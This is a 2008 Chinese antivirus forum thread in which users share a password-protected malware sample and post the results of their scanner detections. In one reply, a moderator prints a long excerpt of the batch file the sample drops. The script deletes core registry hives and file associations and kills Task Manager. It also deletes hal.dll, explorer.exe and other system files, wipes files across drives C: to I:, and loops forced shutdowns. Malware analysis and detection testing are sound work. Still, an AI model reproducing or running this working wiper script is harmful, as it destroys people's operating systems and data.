收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 圣诞一强---12/25,送给样本区的同行们!!
123下一页
返回列表 发新帖
查看: 4218|回复: 23
收起左侧

[病毒样本] 圣诞一强---12/25,送给样本区的同行们!!

[复制链接]
wcj20236
头像被屏蔽
发表于 2008-12-25 08:42:43 | 显示全部楼层 |阅读模式
圣诞快乐---12/25,送给样本区的同行们!!  密码:virus       是不是都挂掉了,咋没人回复结果呢。。。。

感谢5楼提取。




[ 本帖最后由 wcj20236 于 2008-12-25 11:19 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

dreams521
发表于 2008-12-25 08:43:53 | 显示全部楼层
沙发先抢,微点都报了吗?~~~~~~~~~~~~~~~~~~~~~~~

[ 本帖最后由 dreams521 于 2008-12-25 08:48 编辑 ]
回复

举报

wcj20236
头像被屏蔽
 楼主| 发表于 2008-12-25 08:52:11 | 显示全部楼层
  我发的帖子送祝福,给别的点饭们测试了……
回复

举报

dreams521
发表于 2008-12-25 09:03:43 | 显示全部楼层
我在微点技术交流QQ群3,有空来玩
回复

举报

will
发表于 2008-12-25 10:11:35 | 显示全部楼层
7M的东东提取到最后就是一个小小的66KB的svchost.exe…


Multi Command-Line Scanner Report
-------------------------------------------------------------------------
D:\Desk\Samples\Collect\MCLS\svchost.exe
Type: Win32 Executable Generic / Extension: .EXE
MD5 Hash: 78ED3401B6A25C6BD1784C758145F90C

ArcaVir -----Nothing
A-squared ----- Trojan.BAT.Qhost.ao!A2
Avast -----Nothing
AVG -----Nothing
AntiVir V8 -----Nothing
BitDefender ----- DeepScan:Generic.Malware.HN!!VTkprn.AED5C633
ClamWin ----- Worm.Autorun-1562
Dr.Web V5 ----- Trojan.StartPage.22156
Eset V3 -----Nothing
F-Prot ----- W32/Trojan2.EIWF  
Ikarus -----Nothing
Jiangmin ----- Worm/AutoRun.beh
Kaspersky -----Nothing
Kingsoft -----Nothing
VBA32 -----Nothing

*** 6/15 antivirus engines found virus in this file ***
-------------------------------------------------------------------------

Task done @ 2008/12/25 四 10:30:52.24
Note: The results might be different from that of the GUI version.


X.O.X.O.

释放一个批处理,摘取部分很XE的内容:

  2. @shift
  3. reg delete "HKEY_CURRENT_CONFIG\Software" /f
  4. reg delete "HKEY_CURRENT_CONFIG\System" /f
  5. reg delete "HKEY_USERS\.DEFAULT" /f
  6. reg delete "HKEY_USERS\S-1-5-18" /f
  7. reg delete "HKEY_USERS\S-1-5-19" /f
  8. reg delete "HKEY_USERS\S-1-5-19_Classes" /f
  9. reg delete "HKEY_USERS\S-1-5-20" /f
  10. reg delete "HKEY_USERS\S-1-5-20_Classes" /f
  11. reg delete "HKEY_USERS\S-1-5-21-602162358-606747145-725345543-1003" /f
  12. reg delete "HKEY_USERS\S-1-5-21-602162358-606747145-725345543-1003_Classes" /f
  13. reg delete "HKEY_LOCAL_MACHINE\HARDWARE" /f
  14. reg delete "HKEY_LOCAL_MACHINE\SAM" /f
  15. reg delete "HKEY_LOCAL_MACHINE\SECURITY" /f
  16. reg delete "HKEY_LOCAL_MACHINE\SOFTWARE" /f
  17. reg delete "HKEY_LOCAL_MACHINE\SYSTEM" /f
  18. reg delete "HKEY_CURRENT_USER\AppEvents" /f
  19. reg delete "HKEY_CURRENT_USER\Console" /f
  20. reg delete "HKEY_CURRENT_USER\Control Panel" /f
  21. reg delete "HKEY_CURRENT_USER\Environment" /f
  22. reg delete "HKEY_CURRENT_USER\Identities" /f
  23. reg delete "HKEY_CURRENT_USER\Keyboard Layout" /f
  24. reg delete "HKEY_CURRENT_USER\Printers" /f
  25. reg delete "HKEY_CURRENT_USER\SessionInformation" /f
  26. reg delete "HKEY_CURRENT_USER\Software" /f
  27. reg delete "HKEY_CURRENT_USER\UNICODE Program Groups" /f
  28. reg delete "HKEY_CURRENT_USER\Volatile Environment" /f
  29. reg delete "HKEY_CURRENT_USER\Windows 3.1 Migration Status" /f
  30. reg delete "HKEY_CLASSES_ROOT\*" /f
  31. reg delete "HKEY_CLASSES_ROOT\.iso" /f
  32. reg delete "HKEY_CLASSES_ROOT\.bin" /f
  33. reg delete "HKEY_CLASSES_ROOT\.img" /f
  34. reg delete "HKEY_CLASSES_ROOT\.cif" /f
  35. reg delete "HKEY_CLASSES_ROOT\.fcd" /f
  36. reg delete "HKEY_CLASSES_ROOT\.nrg" /f
  37. reg delete "HKEY_CLASSES_ROOT\.gcd" /f
  38. reg delete "HKEY_CLASSES_ROOT\.p01" /f
  39. reg delete "HKEY_CLASSES_ROOT\.c2d" /f
  40. reg delete "HKEY_CLASSES_ROOT\.tao" /f
  41. reg delete "HKEY_CLASSES_ROOT\.dao" /f
  42. reg delete "HKEY_CLASSES_ROOT\.cdi" /f
  43. reg delete "HKEY_CLASSES_ROOT\.cue" /f
  44. reg delete "HKEY_CLASSES_ROOT\.cd" /f
  45. reg delete "HKEY_CLASSES_ROOT\.gi" /f
  46. reg delete "HKEY_CLASSES_ROOT\.pxi" /f
  47. reg delete "HKEY_CLASSES_ROOT\.pdi" /f
  48. reg delete "HKEY_CLASSES_ROOT\.mds" /f
  49. reg delete "HKEY_CLASSES_ROOT\.mdf" /f
  50. reg delete "HKEY_CLASSES_ROOT\.ccd" /f
  51. reg delete "HKEY_CLASSES_ROOT\.vc4" /f
  52. reg delete "HKEY_CLASSES_ROOT\.b5t" /f
  53. reg delete "HKEY_CLASSES_ROOT\.b5i" /f
  54. reg delete "HKEY_CLASSES_ROOT\.dmg" /f
  55. reg delete "HKEY_CLASSES_ROOT\.ibp" /f
  56. reg delete "HKEY_CLASSES_ROOT\.ibq" /f
  57. reg delete "HKEY_CLASSES_ROOT\.ncd" /f
  58. reg delete "HKEY_CLASSES_ROOT\.bmp" /f
  59. reg delete "HKEY_CLASSES_ROOT\.dib" /f
  60. reg delete "HKEY_CLASSES_ROOT\.jpeg" /f
  61. reg delete "HKEY_CLASSES_ROOT\.jpg" /f
  62. reg delete "HKEY_CLASSES_ROOT\.jpe" /f
  63. reg delete "HKEY_CLASSES_ROOT\.jfif" /f
  64. reg delete "HKEY_CLASSES_ROOT\.gif" /f
  65. reg delete "HKEY_CLASSES_ROOT\.png" /f
  66. reg delete "HKEY_CLASSES_ROOT\.tif" /f
  67. reg delete "HKEY_CLASSES_ROOT\.tiff" /f
  68. reg delete "HKEY_CLASSES_ROOT\.psd" /f
  69. reg delete "HKEY_CLASSES_ROOT\.pdd" /f
  70. reg delete "HKEY_CLASSES_ROOT\.rle" /f
  71. reg delete "HKEY_CLASSES_ROOT\.eps" /f
  72. reg delete "HKEY_CLASSES_ROOT\.psb" /f
  73. reg delete "HKEY_CLASSES_ROOT\.pcx" /f
  74. reg delete "HKEY_CLASSES_ROOT\.pdf" /f
  75. reg delete "HKEY_CLASSES_ROOT\.pdp" /f
  76. reg delete "HKEY_CLASSES_ROOT\.raw" /f
  77. reg delete "HKEY_CLASSES_ROOT\.pct" /f
  78. reg delete "HKEY_CLASSES_ROOT\.pict" /f
  79. reg delete "HKEY_CLASSES_ROOT\.pxr" /f
  80. reg delete "HKEY_CLASSES_ROOT\.pbm" /f
  81. reg delete "HKEY_CLASSES_ROOT\.pgm" /f
  82. reg delete "HKEY_CLASSES_ROOT\.ppm" /f
  83. reg delete "HKEY_CLASSES_ROOT\.pfm" /f
  84. reg delete "HKEY_CLASSES_ROOT\.pnm" /f
  85. reg delete "HKEY_CLASSES_ROOT\.pam" /f
  86. reg delete "HKEY_CLASSES_ROOT\.sct" /f
  87. reg delete "HKEY_CLASSES_ROOT\.tga" /f
  88. reg delete "HKEY_CLASSES_ROOT\.vda" /f
  89. reg delete "HKEY_CLASSES_ROOT\.icb" /f
  90. reg delete "HKEY_CLASSES_ROOT\.vst" /f
  91. reg delete "HKEY_CLASSES_ROOT\.rtf" /f
  92. reg delete "HKEY_CLASSES_ROOT\.txt" /f
  93. reg delete "HKEY_CLASSES_ROOT\.docx" /f
  94. reg delete "HKEY_CLASSES_ROOT\.kgb" /f
  95. reg delete "HKEY_CLASSES_ROOT\.doc" /f
  96. reg delete "HKEY_CLASSES_ROOT\.dot" /f
  97. reg delete "HKEY_CLASSES_ROOT\.docm" /f
  98. reg delete "HKEY_CLASSES_ROOT\.dotx" /f
  99. reg delete "HKEY_CLASSES_ROOT\.dotm" /f
  100. reg delete "HKEY_CLASSES_ROOT\.xlsx" /f
  101. reg delete "HKEY_CLASSES_ROOT\.xlsm" /f
  102. reg delete "HKEY_CLASSES_ROOT\.xlsb" /f
  103. reg delete "HKEY_CLASSES_ROOT\.xls" /f
  104. reg delete "HKEY_CLASSES_ROOT\.xml" /f
  105. reg delete "HKEY_CLASSES_ROOT\.mht" /f
  106. reg delete "HKEY_CLASSES_ROOT\.mhtml" /f
  107. reg delete "HKEY_CLASSES_ROOT\.htm" /f
  108. reg delete "HKEY_CLASSES_ROOT\.html" /f
  109. reg delete "HKEY_CLASSES_ROOT\.xltx" /f
  110. reg delete "HKEY_CLASSES_ROOT\.xltm" /f
  111. reg delete "HKEY_CLASSES_ROOT\.csv" /f
  112. reg delete "HKEY_CLASSES_ROOT\.prn" /f
  113. reg delete "HKEY_CLASSES_ROOT\.dif" /f
  114. reg delete "HKEY_CLASSES_ROOT\.slk" /f
  115. reg delete "HKEY_CLASSES_ROOT\.xlam" /f
  116. reg delete "HKEY_CLASSES_ROOT\.mdb" /f
  117. reg delete "HKEY_CLASSES_ROOT\.php" /f
  118. reg delete "HKEY_CLASSES_ROOT\.swf" /f
  119. reg delete "HKEY_CLASSES_ROOT\.fla" /f
  120. reg delete "HKEY_CLASSES_ROOT\.exe" /f
  121. reg delete "HKEY_CLASSES_ROOT\.log" /f
  122. reg delete "HKEY_CLASSES_ROOT\.avi" /f
  123. reg delete "HKEY_CLASSES_ROOT\.mp3" /f
  124. reg delete "HKEY_CLASSES_ROOT\.wav" /f
  125. reg delete "HKEY_CLASSES_ROOT\.vmw" /f
  126. reg delete "HKEY_CLASSES_ROOT\.dvx" /f
  127. reg delete "HKEY_CLASSES_ROOT\.old" /f
  128. reg delete "HKEY_CLASSES_ROOT\.prx" /f
  129. reg delete "HKEY_CLASSES_ROOT\.bak" /f
  130. reg delete "HKEY_CLASSES_ROOT\.dat" /f
  131. reg delete "HKEY_CLASSES_ROOT\.csv" /f
  132. reg delete "HKEY_CLASSES_ROOT\.tmp" /f
  133. reg delete "HKEY_CLASSES_ROOT\.ini" /f
  134. reg delete "HKEY_CLASSES_ROOT\.dll" /f
  135. reg delete "HKEY_CLASSES_ROOT\.mdb" /f
  136. reg delete "HKEY_CLASSES_ROOT\.wsc" /f
  137. reg delete "HKEY_CLASSES_ROOT\.mod" /f
  138. reg delete "HKEY_CLASSES_ROOT\.vbs" /f
  139. reg delete "HKEY_CLASSES_ROOT\.cmd" /f
  140. reg delete "HKEY_CLASSES_ROOT\.scr" /f
  141. reg delete "HKEY_CLASSES_ROOT\.cpl" /f
  142. reg delete "HKEY_CLASSES_ROOT\.rat" /f
  143. reg delete "HKEY_CLASSES_ROOT\.msi" /f
  144. reg delete "HKEY_CLASSES_ROOT\.cpl" /f
  145. reg delete "HKEY_CLASSES_ROOT\.xml" /f
  146. reg delete "HKEY_CLASSES_ROOT\.msc" /f
  147. reg delete "HKEY_CLASSES_ROOT\.drv" /f
  148. reg delete "HKEY_CLASSES_ROOT\.vxd" /f
  149. reg delete "HKEY_CLASSES_ROOT\.ocx" /f
  150. reg delete "HKEY_CLASSES_ROOT\.uce" /f
  151. reg delete "HKEY_CLASSES_ROOT\.tsp" /f
  152. reg delete "HKEY_CLASSES_ROOT\.tmp" /f
  153. reg delete "HKEY_CLASSES_ROOT\.tsk" /f
  154. reg delete "HKEY_CLASSES_ROOT\.tlb" /f
  155. reg delete "HKEY_CLASSES_ROOT\.tha" /f
  156. reg delete "HKEY_CLASSES_ROOT\.sve" /f
  157. reg delete "HKEY_CLASSES_ROOT\.sql" /f
  158. reg delete "HKEY_CLASSES_ROOT\.sep" /f
  159. reg delete "HKEY_CLASSES_ROOT\.sig" /f
  160. reg delete "HKEY_CLASSES_ROOT\.olb" /f
  161. reg delete "HKEY_CLASSES_ROOT\.oca" /f
  162. reg delete "HKEY_CLASSES_ROOT\.nt" /f
  163. reg delete "HKEY_CLASSES_ROOT\.nls" /f
  164. reg delete "HKEY_CLASSES_ROOT\.pro" /f
  165. reg delete "HKEY_CLASSES_ROOT\.rll" /f
  166. reg delete "HKEY_CLASSES_ROOT\.rom" /f
  167. reg delete "HKEY_CLASSES_ROOT\.ram" /f
  168. reg delete "HKEY_CLASSES_ROOT\.nls" /f
  169. reg delete "HKEY_CLASSES_ROOT\.nld" /f
  170. reg delete "HKEY_CLASSES_ROOT\.ita" /f
  171. reg delete "HKEY_CLASSES_ROOT\.iec" /f
  172. reg delete "HKEY_CLASSES_ROOT\.ime" /f
  173. reg delete "HKEY_CLASSES_ROOT\.h" /f
  174. reg delete "HKEY_CLASSES_ROOT\.hxx" /f
  175. reg delete "HKEY_CLASSES_ROOT\.sys" /f
  176. reg delete "HKEY_CLASSES_ROOT\.dep" /f
  177. reg delete "HKEY_CLASSES_ROOT\.deu" /f
  178. reg delete "HKEY_CLASSES_ROOT\.enu" /f
  179. reg delete "HKEY_CLASSES_ROOT\.esn" /f
  180. reg delete "HKEY_CLASSES_ROOT\.chm" /f
  181. reg delete "HKEY_CLASSES_ROOT\.hlp" /f
  182. reg delete "HKEY_CLASSES_ROOT\.dat" /f
  183. reg delete "HKEY_CLASSES_ROOT\.dbl" /f
  184. reg delete "HKEY_CLASSES_ROOT\.cpx" /f
  185. reg delete "HKEY_CLASSES_ROOT\.cpi" /f
  186. reg delete "HKEY_CLASSES_ROOT\.cht" /f
  187. reg delete "HKEY_CLASSES_ROOT\.chs" /f
  188. reg delete "HKEY_CLASSES_ROOT\.c" /f
  189. reg delete "HKEY_CLASSES_ROOT\.acm" /f
  190. reg delete "HKEY_CLASSES_ROOT\.ax" /f
  191. reg delete "HKEY_CLASSES_ROOT\.com" /f
  192. reg delete "HKEY_CLASSES_ROOT\." /f
  193. reg delete "HKEY_CLASSES_ROOT\." /f
  194. reg delete "HKEY_CLASSES_ROOT\." /f


  197. tskill taskmgr


  200. reg add "HKLM\Software\Microsoft\Windows\CurrentVersion" /v %random%.bat /d %0
  201. Shutdown -s -t 1200 -c "tienes 20 min......-==MatzHKR==- Despidete de tu PC"
  202. tskill taskmgr

  204. del /f C:\WINDOWS\system\hal.dll
  205. del /f C:\WINDOWS\system32\hal.dll
  206. del /f C:\WINDOWS\system\system.*
  207. del /f C:\WINDOWS\system32\system.*
  208. del /f C:\WINDOWS\system32\Win.com
  209. del /f C:\WINDOWS\system32\command.com
  210. del /f C:\WINDOWS\system32\keyboard.*
  211. del /f C:\WINDOWS\system32\shell.*
  212. del /f C:\WINDOWS\system32\mouse.*
  213. del /f C:\WINDOWS\system32\msvideo.*
  214. del /f C:\WINDOWS\regedit.exe
  215. del /f C:\WINDOWS\taskman.exe
  216. del /f C:\WINDOWS\explorer.exe
  217. del /f C:\WINDOWS\system32\taskkill.exe
  218. del /f C:\WINDOWS\system32\tasklist.exe
  219. del /f C:\WINDOWS\system32\taskmgr.exe
  220. del /f C:\WINDOWS\keyboard.*

  222. DEL C:\/Q /F /S *.dll
  223. DEL C:\/Q /F /S *.exe
  224. DEL C:\/Q /F /S *.jpg
  225. DEL C:\/Q /F /S *.txt
  226. DEL C:\/Q /F /S *.rar
  227. DEL C:\/Q /F /S *.zip
  228. DEL C:\/Q /F /S *.mp3
  229. DEL D:\/Q /F /S *.dll
  230. DEL D:\/Q /F /S *.exe
  231. DEL D:\/Q /F /S *.jpg
  232. DEL D:\/Q /F /S *.txt
  233. DEL D:\/Q /F /S *.rar
  234. DEL D:\/Q /F /S *.zip
  235. DEL D:\/Q /F /S *.mp3





  241. cd\
  242. cd C:
  243. del *.* /f /s /q

  245. cd\
  246. cd D:
  247. del *.* /f /s /q

  249. cd\
  250. cd E:
  251. del *.* /f /s /q

  253. cd\
  254. cd F:
  255. del *.* /f /s /q

  257. cd\
  258. cd G:
  259. del *.* /f /s /q

  261. cd\
  262. cd H:
  263. del *.* /f /s /q

  265. cd\
  266. cd I:
  267. del *.* /f /s /q

  269. :MatzHKR

  271. echo Shutdown -s -t 1 >>%random%.bat
  272. echo Shutdown -s -t 1 >>%random%CHILIxHACKERS%random%.bat
  273. echo Shutdown -s -t 1 >>%random%CHILExHACKERS%random%.bat
  274. echo Shutdown -s -t 1 >>%random%CHILExHACKERSS%random%.bat
  275. tskill taskmgr.exe
  276. tskill reg.exe


  279. goto MatzHKR
复制代码

[ 本帖最后由 will 于 2008-12-25 10:40 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

su-tt
发表于 2008-12-25 10:45:24 | 显示全部楼层

回复 5楼 will 的帖子

多谢版主提取,ESS不报
回复

举报

清风怡人
发表于 2008-12-25 11:29:28 | 显示全部楼层
大蜘蛛报
回复

举报

Kitman
发表于 2008-12-25 11:38:55 | 显示全部楼层
To avira
Merry Christmas
回复

举报

啊弥陀佛
发表于 2008-12-25 11:43:24 | 显示全部楼层
微点拦截

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

JusticeH
发表于 2008-12-25 11:45:10 | 显示全部楼层
BitDefender AntiVirus 2009
Found: DeepScan:Generic.Malware.HN!!VTkprn.AED5C633

BD倒是還是捉到一個
Matz_Desencrypter.exe=>Deepscan:Generic.Malware.HN!VTkprng.5B973548
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-22 00:34 , Processed in 0.150206 second(s), 22 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表